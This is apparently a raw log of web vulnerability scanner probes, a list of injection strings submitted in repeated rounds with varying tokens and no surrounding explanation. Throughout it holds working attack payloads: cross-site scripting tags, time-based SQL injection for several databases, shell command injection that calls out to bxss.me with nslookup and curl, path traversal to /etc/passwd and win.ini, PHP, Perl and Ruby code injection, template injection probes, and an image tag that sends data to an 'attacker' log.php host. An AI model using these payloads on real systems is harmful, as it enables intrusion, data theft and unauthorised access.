555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9252'>
555<body onload=EFhU(9542)>
555<img src=//xss.bxss.me/t/dot.gif onload=EFhU(9986)>
555<img src=xyz OnErRor=EFhU(9127)>
555<img/src=">" onerror=alert(9987)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%45%46%68%55%289634%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\EFhU(9345)\u003C/sCripT\u003E
555<ScRiPt>EFhU(9897)</sCripT>
%F6<img zzz onmouseover=EFhU(98471) //%F6>
555<input autofocus onfocus=EFhU(9427)>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(EFhU(9597))}
555oVNq3
<ScRiPt >EFhU(9815)</ScRiPt>
555<WCM732>K2BQQ[!+!]</WCM732>
555<ifRAme sRc=9617.com></IfRamE>
555<axOh0Tw x=9980>
555<img sRc='http://attacker-9431/log.php?
555<aqoFtnx<
555-1; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555-1)); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555-1 waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
5558xV3FKxl'; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555QqqkPdc2'); waitfor delay '0:0:15' --
555rPeOeSAQ')); waitfor delay '0:0:15' --
555-1 OR 298=(SELECT 298 FROM PG_SLEEP(15))--
555-1) OR 94=(SELECT 94 FROM PG_SLEEP(15))--
555-1)) OR 325=(SELECT 325 FROM PG_SLEEP(15))--
555Jf3iQAca' OR 933=(SELECT 933 FROM PG_SLEEP(15))--
555zbuAHOfn') OR 919=(SELECT 919 FROM PG_SLEEP(15))--
555ehsR2BzQ')) OR 152=(SELECT 152 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@QSXvS
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9122386*9899339)
'+response.write(9122386*9899339)+'
"+response.write(9122386*9899339)+"
/../../../../../../../../../../windows/system32/BITSADMIN.exe
<% response.write(9122386*9899339) %>
555
+response.write(9122386*9899339)'
555
555
555
555
echo yovbzr$()\ whdwnm\nz^xyu||a #' &echo yovbzr$()\ whdwnm\nz^xyu||a #|" &echo yovbzr$()\ whdwnm\nz^xyu||a #
555
&echo embapl$()\ cisjfi\nz^xyu||a #' &echo embapl$()\ cisjfi\nz^xyu||a #|" &echo embapl$()\ cisjfi\nz^xyu||a #
555&echo ccwbco$()\ aqluxp\nz^xyu||a #' &echo ccwbco$()\ aqluxp\nz^xyu||a #|" &echo ccwbco$()\ aqluxp\nz^xyu||a #
|echo hmxofd$()\ kazxvi\nz^xyu||a #' |echo hmxofd$()\ kazxvi\nz^xyu||a #|" |echo hmxofd$()\ kazxvi\nz^xyu||a #
555|echo gdsibq$()\ rsusej\nz^xyu||a #' |echo gdsibq$()\ rsusej\nz^xyu||a #|" |echo gdsibq$()\ rsusej\nz^xyu||a #
(nslookup -q=cname hitjoprtzvhid28d6a.bxss.me||curl hitjoprtzvhid28d6a.bxss.me))
$(nslookup -q=cname hitvbhovnipia1bae9.bxss.me||curl hitvbhovnipia1bae9.bxss.me)
&nslookup -q=cname hitcrgqjyigvyf67b2.bxss.me&'\"`0&nslookup -q=cname hitcrgqjyigvyf67b2.bxss.me&`'
&(nslookup -q=cname hitniyaycapjl4b3fb.bxss.me||curl hitniyaycapjl4b3fb.bxss.me)&'\"`0&(nslookup -q=cname hitniyaycapjl4b3fb.bxss.me||curl hitniyaycapjl4b3fb.bxss.me)&`'
|(nslookup -q=cname hitaqdfniotvi6e188.bxss.me||curl hitaqdfniotvi6e188.bxss.me)
`(nslookup -q=cname hitpudiauqadq9b71a.bxss.me||curl hitpudiauqadq9b71a.bxss.me)`
;(nslookup -q=cname hitjqsaoxxalzf8e8f.bxss.me||curl hitjqsaoxxalzf8e8f.bxss.me)|(nslookup -q=cname hitjqsaoxxalzf8e8f.bxss.me||curl hitjqsaoxxalzf8e8f.bxss.me)&(nslookup -q=cname hitjqsaoxxalzf8e8f.bxss.me||curl hitjqsaoxxalzf8e8f.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitxpiazqrtgg6d658.bxss.me||curl${IFS}hitxpiazqrtgg6d658.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitmubpfflvud074c3.bxss.me||curl${IFS}hitmubpfflvud074c3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitmubpfflvud074c3.bxss.me||curl${IFS}hitmubpfflvud074c3.bxss.me)&`'
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
555
555
file:///etc/passwd
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+455-455-1=0+0+0+1 --
-1 OR 2+110-110-1=0+0+0+1
555
-1' OR 2+788-788-1=0+0+0+1 --
-1' OR 2+110-110-1=0+0+0+1 or 'axFwG3L0'='
-1" OR 2+567-567-1=0+0+0+1 --
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
${10000458+9999013}
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
)
../../../../../../../../../../../../../../etc/shells
!(()&&!|*|*|
c:/windows/win.ini
^(#$!@#$)(()))******
bxss.me
555
555
555
555
555
555
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
'"()
555'&&sleep(27*1000)*illhyf&&'
555"&&sleep(27*1000)*myzgvd&&"
555'||sleep(27*1000)*whvhnt||'
555"||sleep(27*1000)*bhqmop||"
555
'.gethostbyname(lc('hitna'.'xykdhjpo67bcd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(78).chr(120).chr(80).'
555
".gethostbyname(lc("hityb"."sdmsuxsj6ce47.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(67).chr(110).chr(84)."
555
gethostbyname(lc('hitcq'.'ahdwjrdn5348e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(81).chr(103).chr(69)
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
";print(md5(31337));$a="
${@print(md5(31337))}
555
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555
"+"A".concat(70-3).concat(22*4).concat(120).concat(90).concat(119).concat(84)+(require"socket"
Socket.gethostbyname("hitwh"+"kdntubwaac75f.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(100).concat(90).concat(100).concat(73)+(require'socket'
Socket.gethostbyname('hitba'+'ympuvueoca387.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(101).concat(72).concat(110).concat(87)+(require'socket'
Socket.gethostbyname('hitny'+'ibpyjslybcef2.bxss.me.')[3].to_s)
555
555
555
nopcommerce-new-release
nopcommerce-new-release/.
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
xfs.bxss.me
555
'"
<!--
555
555
555'"()&%<zzz><ScRiPt >oLqV(9728)</ScRiPt>
'"()&%<zzz><ScRiPt >oLqV(9225)</ScRiPt>
5559386309
555'"()&%<zzz><ScRiPt >lXxK(9622)</ScRiPt>
555
'"()&%<zzz><ScRiPt >lXxK(9243)</ScRiPt>
bfg6685<s1﹥s2ʺs3ʹhjl6685
555
5559746054
bfgx10013%C0%BEz1%C0%BCz2a%90bcxhjl10013
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555-1; waitfor delay '0:0:15' --
555<ScRiPt >oLqV(9518)</ScRiPt>
555<WO2X0A>UEYVU[!+!]</WO2X0A>
555<script>oLqV(9299)</script>
555<script>oLqV(9314)</script>9314
555<ScR<ScRiPt>IpT>oLqV(9203)</sCr<ScRiPt>IpT>
555<ScRiPt
>oLqV(9472)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9478></ScRiPt>
555-1); waitfor delay '0:0:15' --
555<isindex type=image src=1 onerror=oLqV(9800)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9523'>
555<body onload=oLqV(9233)>
555<img src=//xss.bxss.me/t/dot.gif onload=oLqV(9073)>
555<img src=xyz OnErRor=oLqV(9853)>
555<img/src=">" onerror=alert(9035)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%4C%71%56%289551%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\oLqV(9216)\u003C/sCripT\u003E
555-1)); waitfor delay '0:0:15' --
555<ScRiPt>oLqV(9870)</sCripT>
%F6<img zzz onmouseover=oLqV(91281) //%F6>
555<input autofocus onfocus=oLqV(9539)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(oLqV(9018))}
5551OdLv
<ScRiPt >oLqV(9315)</ScRiPt>
555<WRQ3UY>SR5W3[!+!]</WRQ3UY>
555-1 waitfor delay '0:0:15' --
555<ifRAme sRc=9019.com></IfRamE>
555<ahXPB9y x=9355>
555<img sRc='http://attacker-9312/log.php?
555<adnBd86<
555
555
555
555b3yytIUr'; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
5553qy6a7rG'); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555gD4oyQf2')); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555-1 OR 796=(SELECT 796 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555-1) OR 655=(SELECT 655 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555-1)) OR 552=(SELECT 552 FROM PG_SLEEP(15))--
555
555
555Sz10nhAQ' OR 635=(SELECT 635 FROM PG_SLEEP(15))--
555CdhBzzdl') OR 213=(SELECT 213 FROM PG_SLEEP(15))--
555b43AuSBO')) OR 695=(SELECT 695 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@OXhLZ
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >6Od7(9334)</ScRiPt>
555
'"()&%<zzz><ScRiPt >6Od7(9293)</ScRiPt>
555
response.write(9608958*9576242)
5559780420
'+response.write(9608958*9576242)+'
"+response.write(9608958*9576242)+"
<% response.write(9608958*9576242) %>
+response.write(9608958*9576242)'
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
555
echo bgtotu$()\ ggnvvb\nz^xyu||a #' &echo bgtotu$()\ ggnvvb\nz^xyu||a #|" &echo bgtotu$()\ ggnvvb\nz^xyu||a #
555
555
555
../../../../../../../../../../../../../../etc/passwd
&echo vbcvej$()\ yadrrg\nz^xyu||a #' &echo vbcvej$()\ yadrrg\nz^xyu||a #|" &echo vbcvej$()\ yadrrg\nz^xyu||a #
555
../../../../../../../../../../../../../../windows/win.ini
555&echo xpydtc$()\ rpcmpk\nz^xyu||a #' &echo xpydtc$()\ rpcmpk\nz^xyu||a #|" &echo xpydtc$()\ rpcmpk\nz^xyu||a #
555
file:///etc/passwd
|echo xxkzpp$()\ ijkips\nz^xyu||a #' |echo xxkzpp$()\ ijkips\nz^xyu||a #|" |echo xxkzpp$()\ ijkips\nz^xyu||a #
555<esi:include src="http://bxss.me/rpb.png"/>
555
${10000060+9999606}
555|echo cbvdbi$()\ wvuvtt\nz^xyu||a #' |echo cbvdbi$()\ wvuvtt\nz^xyu||a #|" |echo cbvdbi$()\ wvuvtt\nz^xyu||a #
555
555
../555
(nslookup -q=cname hitpqmmfikzjo97163.bxss.me||curl hitpqmmfikzjo97163.bxss.me))
555
555
$(nslookup -q=cname hitlrirmfdqyje75b6.bxss.me||curl hitlrirmfdqyje75b6.bxss.me)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
&nslookup -q=cname hitftpxhwmnys2112e.bxss.me&'\"`0&nslookup -q=cname hitftpxhwmnys2112e.bxss.me&`'
555
&(nslookup -q=cname hitwujempizwcc7b8f.bxss.me||curl hitwujempizwcc7b8f.bxss.me)&'\"`0&(nslookup -q=cname hitwujempizwcc7b8f.bxss.me||curl hitwujempizwcc7b8f.bxss.me)&`'
Http://bxss.me/t/fit.txt
555
|(nslookup -q=cname hitlehyaapoof891f9.bxss.me||curl hitlehyaapoof891f9.bxss.me)
http://bxss.me/t/fit.txt?.jpg
555
555
`(nslookup -q=cname hitaiksznvgws65fd4.bxss.me||curl hitaiksznvgws65fd4.bxss.me)`
/etc/shells
;(nslookup -q=cname hitsefvakgotme13ca.bxss.me||curl hitsefvakgotme13ca.bxss.me)|(nslookup -q=cname hitsefvakgotme13ca.bxss.me||curl hitsefvakgotme13ca.bxss.me)&(nslookup -q=cname hitsefvakgotme13ca.bxss.me||curl hitsefvakgotme13ca.bxss.me)
../../../../../../../../../../../../../../etc/shells
|(nslookup${IFS}-q${IFS}cname${IFS}hitjshgwghpsb7491b.bxss.me||curl${IFS}hitjshgwghpsb7491b.bxss.me)
c:/windows/win.ini
&(nslookup${IFS}-q${IFS}cname${IFS}hitnttqjlvsatac5fa.bxss.me||curl${IFS}hitnttqjlvsatac5fa.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitnttqjlvsatac5fa.bxss.me||curl${IFS}hitnttqjlvsatac5fa.bxss.me)&`'
bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
!(()&&!|*|*|
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
'.gethostbyname(lc('hitlw'.'dawgrmdwcc05a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(68).chr(110).chr(79).'
555
".gethostbyname(lc("hitlz"."ocbtkfxo287cb.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(90).chr(101).chr(86)."
gethostbyname(lc('hitqa'.'lttjrcimd545c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(85).chr(108).chr(73)
555
555
'"()
555
555'&&sleep(27*1000)*inuspo&&'
555"&&sleep(27*1000)*alpoyx&&"
555'||sleep(27*1000)*fsfxwg||'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555"||sleep(27*1000)*uueetz||"
';print(md5(31337));$a='
555
";print(md5(31337));$a="
555
${@print(md5(31337))}
${@print(md5(31337))}\
555
'.print(md5(31337)).'
555
555
HttP://bxss.me/t/xss.html?%00
555
555
bxss.me/t/xss.html?%00
555
555
"+"A".concat(70-3).concat(22*4).concat(116).concat(74).concat(117).concat(76)+(require"socket"
Socket.gethostbyname("hitxx"+"hnmxvhnm10da2.bxss.me.")[3].to_s)+"
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(121).concat(82).concat(118).concat(86)+(require'socket'
Socket.gethostbyname('hitdb'+'gbghrxli9a727.bxss.me.')[3].to_s)+'
555
555
'A'.concat(70-3).concat(22*4).concat(115).concat(78).concat(109).concat(73)+(require'socket'
Socket.gethostbyname('hitwr'+'taxjswpg39dd9.bxss.me.')[3].to_s)
555
555
555
555
555
555
nopcommerce-new-release
555
555
nopcommerce-new-release/.
555
555
555
-1 OR 2+123-123-1=0+0+0+1 --
555
-1 OR 2+938-938-1=0+0+0+1
-1' OR 2+846-846-1=0+0+0+1 --
555
xfs.bxss.me
-1' OR 2+826-826-1=0+0+0+1 or 'YNNByTFv'='
555
555
-1" OR 2+313-313-1=0+0+0+1 --
555
555
'"
<!--
555'"()&%<zzz><ScRiPt >pPU7(9097)</ScRiPt>
555
555
'"()&%<zzz><ScRiPt >pPU7(9166)</ScRiPt>
5559062335
555
bfg5407<s1﹥s2ʺs3ʹhjl5407
bfgx2878%C0%BEz1%C0%BCz2a%90bcxhjl2878
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
555*if(now()=sysdate(),sleep(15),0)
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >pPU7(9513)</ScRiPt>
555<W3ITKS>O9ELX[!+!]</W3ITKS>
555<script>pPU7(9874)</script>
555<script>pPU7(9201)</script>9201
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555<ScR<ScRiPt>IpT>pPU7(9367)</sCr<ScRiPt>IpT>
555<ScRiPt
>pPU7(9702)</ScRiPt>
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9776></ScRiPt>
555
555<isindex type=image src=1 onerror=pPU7(9980)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9038'>
555<body onload=pPU7(9712)>
555<img src=//xss.bxss.me/t/dot.gif onload=pPU7(9740)>
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555<img src=xyz OnErRor=pPU7(9157)>
555<img/src=">" onerror=alert(9680)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%70%50%55%37%289722%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\pPU7(9834)\u003C/sCripT\u003E
555<ScRiPt>pPU7(9685)</sCripT>
%F6<img zzz onmouseover=pPU7(97541) //%F6>
555<input autofocus onfocus=pPU7(9737)>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(pPU7(9024))}
555A1RaY
<ScRiPt >pPU7(9099)</ScRiPt>
555<WGA6WZ>XDHYT[!+!]</WGA6WZ>
555<ifRAme sRc=9893.com></IfRamE>
555<a7PcExf x=9094>
555<img sRc='http://attacker-9490/log.php?
555-1; waitfor delay '0:0:15' --
555<aAgACSI<
555
555
555
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
555
555
555
555
555-1)); waitfor delay '0:0:15' --
555
555
555
555
555
555
555-1 waitfor delay '0:0:15' --
555
555
555
555
555
555
555
5552Vu4wMIn'; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555yf7cLXUC'); waitfor delay '0:0:15' --
555
555
555
555
555
555
5559VrmsVwF')); waitfor delay '0:0:15' --
555
555
555-1 OR 370=(SELECT 370 FROM PG_SLEEP(15))--
555-1) OR 80=(SELECT 80 FROM PG_SLEEP(15))--
555-1)) OR 443=(SELECT 443 FROM PG_SLEEP(15))--
555U6EdD69V' OR 775=(SELECT 775 FROM PG_SLEEP(15))--
555jXL355s4') OR 361=(SELECT 361 FROM PG_SLEEP(15))--
555RNsOWtLx')) OR 696=(SELECT 696 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@BHthC
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >nK6Y(9700)</ScRiPt>
'"()&%<zzz><ScRiPt >nK6Y(9123)</ScRiPt>
555
5559686268
555
bfg10562<s1﹥s2ʺs3ʹhjl10562
bfgx7020%C0%BEz1%C0%BCz2a%90bcxhjl7020
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >nK6Y(9552)</ScRiPt>
555
555<WHCYIS>2L9TP[!+!]</WHCYIS>
555
555<script>nK6Y(9336)</script>
555
555<script>nK6Y(9243)</script>9243
555
555<ScR<ScRiPt>IpT>nK6Y(9745)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>nK6Y(9861)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9881></ScRiPt>
555
555
555
555<isindex type=image src=1 onerror=nK6Y(9057)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9274'>
555<body onload=nK6Y(9771)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=nK6Y(9516)>
555
555<img src=xyz OnErRor=nK6Y(9756)>
555
555<img/src=">" onerror=alert(9675)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%6E%4B%36%59%289070%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\nK6Y(9882)\u003C/sCripT\u003E
555
555<ScRiPt>nK6Y(9150)</sCripT>
555
%F6<img zzz onmouseover=nK6Y(95991) //%F6>
555
555<input autofocus onfocus=nK6Y(9491)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(nK6Y(9214))}
555
555YSKHe
<ScRiPt >nK6Y(9077)</ScRiPt>
555
555<W6U0TK>6DA2G[!+!]</W6U0TK>
555
555<ifRAme sRc=9197.com></IfRamE>
555
555<a3ok0iw x=9835>
555
555<img sRc='http://attacker-9144/log.php?
555
555<aUHdZAo<
555
555
555